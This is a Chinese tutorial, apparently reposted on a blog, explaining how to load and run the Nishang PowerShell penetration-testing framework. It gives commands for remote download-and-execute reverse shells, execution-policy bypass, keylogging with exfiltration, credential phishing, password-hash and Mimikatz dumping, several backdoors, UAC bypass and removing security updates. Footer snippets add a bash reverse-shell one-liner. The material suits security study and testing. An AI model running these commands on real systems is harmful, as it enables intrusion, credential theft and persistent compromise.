Powershell 渗透测试工具-Nishang

最新推荐文章于 2022-04-12 14:11:29 发布
最新推荐文章于 2022-04-12 14:11:29 发布
阅读量442 收藏 3
点赞数 1
文章标签: php 人工智能 运维
原文链接:https://yq.aliyun.com/articles/394544
版权

Powershell 渗透测试工具-Nishang

http://p5.qhimg.com/t014034b9dcf5c9e75b.png

 

作者:V1ct0r

稿费:500RMB(不服你也来投稿啊!)

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

传送门

【技术分享】Powershell 渗透测试工具-Nishang(一)

 

0x00 介绍

Powershell用于渗透测试其实早在多年前就已经被提出了。利用Powershell,攻击者可以在无需接触磁盘的情况下执行命令等,并且相较已经被大家广泛关注并防御的Cmd而言,Powershell并非那么的引人瞩目。Nishang是基于PowerShell的渗透测试专用工具。它集成了框架、脚本和各种payload,能够帮助渗透测试人员在对Windows目标的全过程检测中使用,是一款来源于作者实战经历的智慧结晶。至今,Nishang最新版本已为v0.67了。本文我将具体介绍这款实用的Powershell渗透测试工具。

 

0x01 使用

要使用Nishang,我们首先需要在[作者的Github]上面下载它,之后加载这些脚本。 

Nishang需要我们的Powershell版本在v3以上才能使用,这里顺便提供两种查看当前我们当前Powershell版本的方法: 

1.直接在我们的Powershell下执行”get-host”命令: 

http://p7.qhimg.com/t0174aabb5199bc3dcd.jpg

2.我们还可以在Powershell下执行”$PSVersionTable.PSVersion”: 

http://p4.qhimg.com/t01e2de2a01b2df6d75.jpg

需要知道的是:

 

默认情况下的Server OS 对应的 Powershell的版本:
Windows 2008 R2   -   Version 2
Windows 2012      -   Version 3
Windows 2012 R2   -   Version 4
Windows 2016      -   Version 5

现在我们需要加载我们的脚本:

PS D:nishang-master> Import-Module .nishang.psm1

你可能会遇到下面的问题: 

http://p2.qhimg.com/t013d3c74fc20686b62.jpg

这是因为我们Powershell的默认的执行策略是Restricted的,而Restricted是不允许任何脚本运行的,我们可以使用下面的命令来来查看当前的执行策略:

PS D:nishang-master> Get-ExecutionPolicy

这里我们需要将执行模式改为RemoteSigned,这样就可以执行其他用户的脚本了:

PS D:nishang-master> set-executionpolicy remotesigned //这需要在管理员的状态下执行

现在,我们就可以正常进行加载了。 

当然,上面是基于我们在本地进行测试的情况下,如果是在真实的攻击场景之下,我们还是不宜去做一些全局策略的更改的,这里简单推荐几个Bypass执行策略的Tricks:

 

0. Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted //设置当前用户的执行策略为Unrestricted,也算是去更改了当前的全局策略
1. powershell.exe -executionpolicy bypass -Windowstyle hidden -noninteractive -nologo -File //或是下面这种,-Windowstyle hidden 可以让我们的执行无任何弹窗
2. PowerShell.exe -ExecutionPolicy Bypass -File

想了解更多姿势,大家可以看看Bypass执行策略的十五种方法: 

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

然后,我们使用Dot Sourcing的方式来加载独立的脚本:

PS D:nishang-master> ."D:nishang-masterGatherGet-Information.ps1"

在之后的使用中,我们可以使用”Get-Help”命令来获取当前脚本的用法和说明等,如:

 

PS D:nishang-master> ."D:nishang-masterGatherGet-WLAN-Keys.ps1 PS D:nishang-master> Get-Help Get-Wlan-Keys

http://p1.qhimg.com/t013508b17e3145aec3.jpg

还需要说的一点是,我们可以在Powershell中使用” Out-File”来将我们的执行结果导出到文件中,如:

PS D:nishang-master> Get-Information | Out-File res.txt

就可以把获取到的信息保存在res.txt中了。 

最后,需要介绍两种在内存当中去加载脚本的方式 

第一种:

powershell iex (New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.] //

这里IEX可以远程下载我们的脚本

第二种,我们可以在Powershell中使用Invoke-Encode脚本来将我们现有的脚本编码压缩,生成编码后的内容,过程如下:

 

PS D:nishang-master> Invoke-Encode -DataToEncode "D:nishang-masterShellsInvoke-PowerShellTcp.ps1" -OutCommand Encoded data written to .encoded.txt Encoded command written to .encodedcommand.txt

在我们的encodedcommand.txt文件中我们可以看到编码后的内容和效果: 

http://p5.qhimg.com/t01bdaf5e1a9ab9830c.jpg

然后在目标上(Web shell,meterpreter native shell等都可以)使用如下命令执行:

C:Userstarget> powershell -e [encodedscript]

这里涉及到的Invoke-PowerShellTcp脚本,我们将在后文对于具体模块的脚本介绍时谈到。

 

0x02 模块介绍

0.信息搜集

Check-VM

从这个脚本的名字就可以看出来,它是用于检测当前的机器是否是一台已知的虚拟机的。它通过检测已知的一些虚拟机的指纹信息(如:Hyper-V, VMWare, Virtual PC, Virtual Box,Xen,QEMU)来识别。 

执行方式:

PS > Check-VM

测试

http://p9.qhimg.com/t01de842df92ec8ac01.jpg

Copy-VSS

这个脚本利用Volume Shadow Copy 服务来复制出SAM文件。如果这个脚本运行在了DC机上ntds.dit和SYSTEM hive也能被拷贝出来。 

执行方式:

 

PS > Copy-VSS //将会直接把文件保存在当前路径下
PS > Copy-VSS -DestinationDir C:temp  //指定保存文件的路径(必须是已经存在的路径)

测试

http://p1.qhimg.com/t011278a7d953361833.jpg

Invoke-CredentialsPhish

这个脚本是用来欺骗用户输入账号密码信息的。 

执行方式:

PS > Invoke-CredentialsPhish

测试

http://p2.qhimg.com/t01ebc9a71ca3930b4d.jpg

执行后会弹出这个框欺骗用户输入 

直到用户输入正确后这个框才会消失,然后我们就可以得到明文的管理员账号密码:

http://p3.qhimg.com/t019564c00d489f7c2c.jpg

FireBuster FireListener

FireBuster可以对内网进行扫描,它会把包发给FireListener 

执行方式:

 

PS > FireBuster 10.10.10.10 1000-1020 PS > FireListener -portrange 1000-1020

该脚本作者的Github上面还提供了一个Python版的监听端: 

https://github.com/roo7break/PowerShell-Scripts/blob/master/FireBuster/ 

测试 

我们首先在我们的机器(Attacker)上面运行FireListener:

FireListener 100-110

http://p9.qhimg.com/t01ad16795412c5d79d.jpg

Victim:

FireBuster 192.168.199.1 90-110 -Verbose

http://p0.qhimg.com/t01b5213809308e427a.jpg

Get-Information

这个脚本可以获取目标机器上大量的信息(FTP访问,进程,计算机配置信息,无线网络和设备的信息,Hosts信息等等非超丰富)。 

执行方式:

PS > Get-Information

http://p4.qhimg.com/t010d6feb1a3c405e6a.jpg

还可以用我们前面说过的Out-File来将运行结果保存到指定文件。

Get-LSASecret

该脚本可以获取LSA信息,但是使用的前提当然是你已经成功提升了权限的情况下,通常和我们后面提权当中涉及到的Enable-DuplicateToken(帮助我们获得System权限)联合使用。 

执行方式:

 

PS > Enable-DuplicateToken
PS > Get-LsaSecret
PS > Get-LsaSecret -RegistryKey KeyName //还可以指定键名

Get-PassHashes

这个脚本在Administrator的权限下,可以dump出密码哈希值。这个脚本来自于msf中powerdump,但做出了修改,使得我们不再需要System权限就可以dump了。 

执行方式:

PS > Get-PassHashes -PSObjectFormat //可以使用-PSObjectFormat来格式化输出结果

http://p5.qhimg.com/t01be58eee4d7e09c5d.jpg

Get-WLAN-Keys

在Administrator的权限下,可以利用这个脚本来dump出WLAN文件的密钥信息。实质上,这个脚本就是利用了netsh wlan show profile name=”” key=clear来获取。 

执行方式:

PS > Get-WLAN-Keys

Keylogger

Keylogger可以保存下用户的键盘记录。 

执行方式:

 

PS > .Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis  //-CheckURL参数会去检查所给出的网页之中是否包含 -MagicString后的字符串,如果存在的话就停止使用记录。
PS > .Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php //将记录指定发送给一个可以记录Post请求的Web服务器
PS > .Keylogger.ps1 -persist //实现持久化记录(重启后依然进行记录)
PS > .Keylogger.ps1 //直接以这种方式来运行,键盘记录会保存在当前用户的Temp目录下key文件中

测试 

首先执行 PS > .Keylogger.ps1

http://p1.qhimg.com/t01a15eeb50aecf23d6.jpg

发现在当前用户的Temp目录下生成了Key的文件,这时我们使用nishang Utility中的Parse_Keys来解析

PS >Parse_Keys .key.log .parsed.txt

然后parsed.txt里面就是解析后的按键记录了

http://p6.qhimg.com/t010484abdcf764db43.jpg

Invoke-MimikatzWdigestDowngrade

Dump出Windows 8.1 and Server 2012的系统用户密码。 

执行方式:

 

PS >Invoke-MimikatzWDigestDowngrade
PS > Get-Job | Receive-Job

执行了

PS >Invoke-MimikatzWDigestDowngrade

Windows会锁屏

http://p2.qhimg.com/t01ca15a4ca59079514.jpg

之后执行

Get-Job

发现尝试多次都测试失败

http://p3.qhimg.com/t01c3b609b3cb7c9930.jpg

解决办法可以参考: 

[域渗透——Dump Clear-Text Password after KB2871997 installed]

Get-PassHints

这个脚本可以从Windows获得用户的密码的提示信息,需要有Administrator的权限来读取SAM hive。 

执行方式:

PS > Get-PassHints

Show-TargetScreen

使用MJPEG传输目标机器的远程桌面的实时画面,在本机我们可以使用NC或者Powercat来进行监听。在本地使用支持MJPEG的浏览器(如:Firefox)访问本机对应监听端口,即可在浏览器上面看到远端传输回来的实时画面。

PS > Show-TargetScreen -Reverse -IPAddress 192.168.230.1 -Port 443  //将远程的画面传送到192.168.230.1的443端口

测试 

Victim:

Show-TargetScreen -IPAddres 192.168.199.127 -Port 5773 -Reverse

Attacker:

nc.exe -nlvp 5773 | nc.exe -nlvp 9000 //这里我使用的NC,也可以用Powercat

本机访问:127.0.0.1:9000

http://p2.qhimg.com/t016ade56c6c650bc2e.jpg

Invoke-Mimikatz

Mimikatz大家都非常熟悉了,就不再介绍了 

执行方式:

 

Invoke-Mimikatz -DumpCerts //Dump出本机的凭证信息
Invoke-Mimikatz -DumpCreds -ComputerName @("computer1", "computer2") //Dump出远程两台计算机的凭证信息
Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1" //在远程一台机器上运行Mimikatz并执行"privilege::debug exit"

1.域相关脚本

Get-Unconstrained

查找域内开启了Kerberos Unconstrained Delegation的机器。 

执行方式:

 

PS > Get-Unconstrained //返回开启的计算机名
PS > Get-Unconstrained -Details  //返回更详细的信息

关于”通过Kerberos Unconstrained Delegation获取到域管理员”: 

http://www.freebuf.com/articles/terminal/98530.html

2.Antak Webshell

Antak

一个ASPX的Webshell,通过这个Webshell可以编码、执行脚本,上传、下载文件。 

http://p6.qhimg.com/t01d433e9d1efbcd1bb.png

执行方式:

 

上传Webshell后把它当成一个正常的Powershell执行窗口来使用
上传和下载文件,只需要填写好对应路径点击上传、下载按钮即可

关于Antak Webshell的更多介绍,请参考: 

http://www.labofapenetrationtester.com/2014/06/introducing-antak.html

3.后门

HTTP-Backdoor

HTTP-Backdoor可以帮助我们在目标机器上下载和执行Powershell脚本 

执行方式:

PS > HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis

下面解释下几个比较重要的参数:

 

CheckURL 给出一个URL地址,如果存在我们MagicString中的值就去执行Payload - 下载运行我们的脚本
PayloadURL 这个参数给出我们需要下载的Powershell脚本的地址
Arguments 这个参数指定我们要执行的函数
StopString 这个参数也会去看是否存在我们CheckURL返回的字符串,如果存在就会停止执行

DNS_TXT_Pwnage

利用DNS隧道来进行信息传输、通信的小技巧已经不少见了。在Nishang中也集成了一个通过DNS TXT来接收命令或者脚本的后门脚本。使用DNS_TXT_Pwnage这个脚本,我们一般需要配合Utility下的Out-DnsTxt使用。 

所以这里首先说下Out-DnsTxt的使用:

PS >Out-DnsTxt -DataToEncode path //path处是你想编码的内容的路径

之后,它会生成一个编码后的文件,如下图所示

http://p8.qhimg.com/t01bee5299c255b52cd.jpg

然后我们去添加对应的TXT记录就行了,encoded.txt文件中每一行为一条记录 

添加完后我们还需要添加两条TXT记录,内容为start和stop 

添加完成后,我们就可以利用DNS_TXT_Pwnage这个脚本了 

执行方式:

PS >DNS_TXT_Pwnage -startdomain start.test.com -cmdstring start -commanddomain command.test.com -psstring test -psdomain xxx.test.com -Subdomains 1 -StopString stop

具体参数的意思:

 

startdomain 会一直去检测我们指定域名的TXT记录,并把返回的记录与我们输入的cmdstring以及psstring进行比较
cmdstring 是我们任意输入的字符串,如果startdomain与我们这里输入的cmdstring值相等则执行commanddomain命令
commanddomain 创建的执行命令TXT记录的域名
psstring 是我们任意输入的字符串,如果与我们这里输入的psstring值相等则执行psdomain脚本
psdomain 是我们创建的执行脚本TXT记录的域名
Subdomains 是执行脚本创建TXT记录的个数
StopString 是任意输入的字符串,如果这里输入的字符串与startdomain中返回的记录相同将会停止执行我们的Payload
Arguments 指定要执行的函数名

Execute-OnTime

执行方式:

PS > Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload

具体参数的意思:

 

PayloadURL 指定我们脚本下载的地址
Arguments 指定执行的函数名
Time 参数可以设定脚本执行的时间(例如 -Time 23:21) CheckURL 参数会检测我们一个指定的URL内容是否存在StopString给出的字符串,如果发现了就停止执行

Gupt-Backdoor

Gupt-Backdoor这个脚本可以帮助我们通过无线SSID反弹后门和执行命令。 

执行方式:

PS >Gupt-Backdoor -MagicString test -Verbose

这里解释一下MagicString这个参数: 

MagicString开头的4个字符是用来识别我们建立的WIFI SSID的。例如,这里是test,Gupt后门会去自动匹配我们WIFI中SSID以test开头的。而MagicString这个参数从第五个字符开始就决定了我们是执行命令或是下载脚本。 

需要注意的是:

如果它的第五个字符是c就代表执行命令。 

例如:-MagicString testcwhoami 

就会匹配WIFI SSID为test的,并执行命令whoami

如果它的第五个字符是u的话就代表下载脚本。 

例如:-MagicString testuXXXX 

就会匹配WIFI SSID为test的,并默认下载http://goo.gl/XXXX 

(其中http://goo.gl可在脚本的$PayloadURL参数中修改)

还可以用Arguments参数来指定下载脚本 

例如: 

PS >Gupt-Backdoor -MagicString test -Argument Get-Information -Verbose 

就可以下载Get-Information的脚本了

补充 

Windows下创建一个WIFI:

 

cmd
netsh wlan set hostednetwork mode=allow
netsh wlan set hostednetwork ssid=test key=1234567890 netsh wlan start hostednetwork

Add-ScrnSaveBackdoor

这个脚本可以帮助我们利用Windows的屏保来留下一个隐藏的后门 

执行方式:

 

PS >Add-ScrnSaveBackdoor -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process" //使用这条语句可以执行我们自己的Payload
PS >Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor 
http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis //利用这条命令可以从powershell执行一个HTTP-Backdoor
PS >Add-ScrnSaveBackdoor -PayloadURL http://192.168.254.1/code_exec.ps1  //还可以使用msfvenom先生成一个powershell (./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.254.226 -f powershell),然后利用这条命令返回一个meterpreter

其他具体的参数的意思和我们上面介绍的一些后门是类似的

 

PayloadURL 指定我们需要下载的脚本地址
Arguments 指定我们要执行的函数以及相关参数

Invoke-ADSBackdoor

这个脚本是使用NTFS数据流留下一个永久性后门。其实,由NTFS数据流带来的一些安全问题的利用并不少见了(如:利用NTFS数据流在Mysql UDF提权中创建lib/plugin目录),大家可以参考《NTFS ADS带来的WEB安全问题》 

这个脚本可以向ADS中注入代码并且以普通用户权限运行 

执行方式:

 

PS >Invoke-ADSBackdoor -PayloadURL http://192.168.254.1/Powerpreter.psm1 -Arguments HTTP-Backdoor "http://pastebin.
com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis

这个脚本主要有两个参数,在上面介绍其他后门当中已经说明了,这里是类似的 

需要说明的是,执行后它会在AppData的目录下建立一个ads并把我们的Payload注入进去,如果我们希望在cmd下看到我们这里建立的ads,需要使用:dir /a /r

4.客户端

对于这一部分的脚本,我就不再赘述了,因为网上早已经有了对于这一部分脚本的介绍说明: 

使用Powershell Client进行有效钓鱼

5.权限提升

Enable-DuplicateToken

这个脚本可以帮助我们在已经获得了一定权限的情况下,使我们提升到System权限。 

执行方式

PS > Enable-DuplicateToken

具体的相关介绍可以查阅: 

https://blogs.technet.microsoft.com/heyscriptingguy/2012/07/05/use-powershell-to-duplicate-process-tokens-via-pinvoke/

Remove-Update

这个脚本可以帮助我们移除系统所有的更新,或所有安全更新,以及指定编号的更新。 

执行方式:

 

PS > Remove-Update All       //移除目标机器上的所有更新
PS > Remove-Update Security  //移除目标机器上所有安全相关更新
PS > Remove-Update KB2761226 //移除指定编号的更新

Invoke-PsUACme

Invoke-PsUACme使用了来自于UACME项目的DLL来Bypass UAC。

http://p9.qhimg.com/t01c9d46ef0d4616a20.jpg

上表给出了各种UAC绕过的方法,我们可以在Invoke-PsUACme中指定相应方法执行。 

执行方式:

 

PS > Invoke-PsUACme -Verbose //使用Sysprep方法和默认的Payload执行
PS > Invoke-PsUACme -method oobe -Verbose //使用oobe方法和默认的Payload执行
PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e YourEncodedPayload" //使用-Payload参数可以自行指定要执行的Payload

除开以上而外,我们还可以使用-PayloadPath参数来指定Payload的路径,默认情况下Payload会在C:WindowsTempcmd.bat结束。还可以使用-CustomDLL64(64位)或-CustomDLL32(32位)参数来自定义一个DLL文件。

6.扫描

Invoke-BruteForce

这个脚本可以对SQL Server、域控制器、Web以及FTP进行口令的爆破 

执行方式:

 

PS > Invoke-BruteForce -ComputerName targetdomain.com -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose //爆破域控制器
PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service SQL -Verbose  //爆破SQL Server
PS > cat C:testservers.txt | Invoke-BruteForce -UserList C:testusers.txt -PasswordList C:testwordlist.txt -Service SQL -Verbose  //爆破server.txt中所有servers的SQL Server

主要的参数:

 

ComputerName 用于指定对应服务的计算机名
UserList 用户名字典
PasswordList 密码字典
Service 服务类型(注意默认为:SQL)
StopOnSuccess 成功找到一个后就停止执行

Invoke-PortScan

利用这个脚本我们可以在目标机器上对内网进行端口扫描 

执行方式:

PS >Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80

主要的参数:

 

StartAddress 扫描范围开始的地址
EndAddress 扫描范围结束的地址
ScanPort 进行端口扫描
Port 指定扫描端口(默认扫描端口:21,22,23,53,69,71,80,98,110,139,111,  389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901) TimeOut 设置超时时间

7.中间人

Invoke-Interceptor

这个脚本可以通过建立一个代理服务器的方式来拦截HTTPS的请求,并将这些请求记录下来 

执行方式:

PS >Invoke-Interceptor -ProxyServer 192.168.230.21 -ProxyPort 3128 //这条命令将默认在8081端口监听并把请求发送给上游代理的3128端口

可以通过ListenPort来修改我们目标机器上的监听端口(默认8081端口) 

例如 

我们在目标机器上执行:

http://p2.qhimg.com/t01108504b824418a77.jpg

然后这里本机我用NC来监听对应端口:

http://p2.qhimg.com/t015396b289b83165bf.jpg

接收到了来自目标机的请求数据 

并且这个脚本会在目标机的TEMP目录下生成interceptor.log的文件来记录请求数据

http://p2.qhimg.com/t0108af44f2c3f7f555.jpg

 

0x03 结语

Nishang这款基于PowerShell的渗透测试专用工具集成了非常多实用的脚本与框架,方便我们在渗透测试过程之中使用。尽管,在一些环境下我们可能没有办法去执行Powershell,但是通过查看这些脚本的具体代码,我们也可以自己去完成实现脚本提供的一些功能。限于篇幅,本文只能抛砖引玉地介绍Nishang的部分功能,希望大家能够在实际的应用之中去体验。

 

参考

1. http://www.labofapenetrationtester.com/ 

2. https://github.com/samratashok/nishang/




















本文转自张昺华-sky博客园博客,原文链接:http://www.cnblogs.com/bonelee/p/8258440.html,如需转载请自行联系原作者

weixin_33713503
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PowerShell-7.2.6-win-x64.msi
10-19
PowerShell-7.2.6-win-x64 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。
如何在 ASP.NET 应用程序中实现模拟用户身份(在ASP.NET中以管理员身份运行网站)...
liuxiaofeng1991的博客
08-11 620
前言 在实际的项目开发中,我们可能会需要调用一些非托管程序,而有些非托管程序需要有更高的身份权限才能正确执行。本文介绍了如何让IIS承载的ASP.NET网站以特定的账户执行,比如Administrator。 概要 本文介绍了在 ASP.NET 应用程序中实现模拟用户身份的不同方式。 更多信息 如果要在 ASP.NET 中的线程上模拟用户,可以根据您的要求使用以下方法之一: 模拟 IIS ...
Nishang powershell框架——使用教程
W小哥
04-08 1786
项目下载地址:https://github.com/samratashok/nishang nishang目录列表 每个目录对应一个功能模块 导入模块nishang 必须导入nishang模块,才可以使用这个工具 Import-Module .\nishang psm1 首先打开powershell Import-Module .\nishang.psm1 初次导入,会有宏色字的提示,是因为windows官方做的一个安全策略导致 解决方法:把执行策略修改一下 Set-ExecutionPolicy R
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1378
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
反弹shell的几种方法
stonesharp的专栏
04-13 4216
bash版本: ? 1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1   ,注意某些linux不支持   perl版本:   ? 1 2 3 4 5 pe
关于同一账号多人同时登录的token重复问题
weixin_33694172的博客
06-18 1万+
最近在项目上遇到了一个同一账号多终端(或者说多用户)同时登录导致的token重复问题。可以在浏览器相应地做一些防止表单重复提交的操作,比如登录按钮点击一次后变成不可点击的状态,等待服务器的响应之后再恢复成点击状态。不过这也并不能解决同一账号多终端登录的问题。 https://github.com/bluesnail9... 项目中的伪代码...
PowerShell-7.0.0-win-x64.zip
03-30
这意味着Windows PowerShellPowerShell Core用户将能够在Windows、Linux和macOS上跨越使用相同版本的PowerShell,而PowerShell 7用户将与他们所依赖的Windows PowerShell模块具有非常高的兼容性。
PowerShell v7.2.4 最新64位安装包 PowerShell-7.2.4-win-x64.msi
05-26
PowerShell 7相比 PowerShell 5有较大程度的改进。附上最新版的安装包,因为直接从Github下是很慢的。百度的离线下载也不能用。放在这里以备不时之需。方便大家。
PowerShell-7.3.6-win-x64.msi
最新发布
08-18
PowerShell-7.3.6-win-x64.msi
PowerShell-7.0.3-winx64msi.rar
09-03
PowerShell7.0.3支持组策略编辑,增加新语言功能如三元运算符。基于SSH的远程处理。PowerShell 7 是专为云、本地和混合环境设计,PowerShell 7 可以与 Windows PowerShell 5.1 共存。
基础篇:内网工具Nishang PowerShell
qq_60115503的博客
04-12 1743
Nishang介绍 Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段
关于进程访问令牌( access token )
远有青山
05-25 1万+
An access token is an object that describes the security context of a process or thread. The information in a token includes the identity and privileges of the user account associated with the pro
SpringBoot防止重复请求,重复表单提交超级简单的注解实现之四(终极版I)
热门推荐
猿份哥
06-12 1万+
2018.11.30更新 前言:上篇文章有的童鞋说不行啊,怎么不能防止重复提交呢! 首先需要说明的是之前的防止重复提交是指:一次请求完成之前防止重复提交,当然扩展下就可以做到会话间防止重复提交,还可以扩展为某个时间段或者永久防止重复提交(这个我就不实现了),下面我来扩展一下相同会话防止重复提交其实很简单 在上一篇的基础上DuplicateAspect不移除标记为SESSION的token就可...
C#通过账号密码访问共享文件夹/目录
凯神做开发
05-06 7930
网上找了很多案例,都试了,还是这个最方便,试试吧~~ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Runtime.InteropServices; using System.IO; namespace ConsoleApp41 { ...
防重复提交之传递token方法
he_xiao123的博客
12-13 888
防重复提交是一件很普通的事,因为之前这块只拿来用了.并未关心其中的实现,现在回来记录一下. 实现方式是:前端在需要防重复提交的页面进入时去服务器拿到token,服务器要把token放到session中一份,等前端提交时删除token,第二次提交时发现token没有.就直接返回重复提交就行了.这种局限性很大,不适合微服务,微服务的话我理解需要用数据库唯一索引(不推荐)或者redis锁(推荐)来实现...
检测当前程序权限和用户类型的说明
xbgprogrammer的专栏
12-05 3570
首先先向大家介绍一下 typedef enum  {  TokenElevationTypeDefault   = 1,  TokenElevationTypeFull,  TokenElevationTypeLimited } TOKEN_ELEVATION_TYPE , *PTOKEN_ELEVATION_TYPE; Constants TokenElevationTypeDef
API DuplicateToken He said hd1
mpg_aid1的专栏
06-24 366
 Welcome to my blog!He said he should try, if t was any way prudent, said the man.Study While Read :(Windows API Declare Function DuplicateToken Lib "advapi32.dll" Alias "DuplicateToken" (ByVal Existi
powershell --和-有什么区别
05-27
"-" 和 "--" 在 PowerShell 中都用于表示参数和选项,但它们有不同的含义。 "-" 用于单个字母的短选项,例如 "-a","-b" 等,也可以用于一些命令的缩写,例如 "-Verbose" 可以缩写为 "-v"。 "--" 用于完整的参数...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值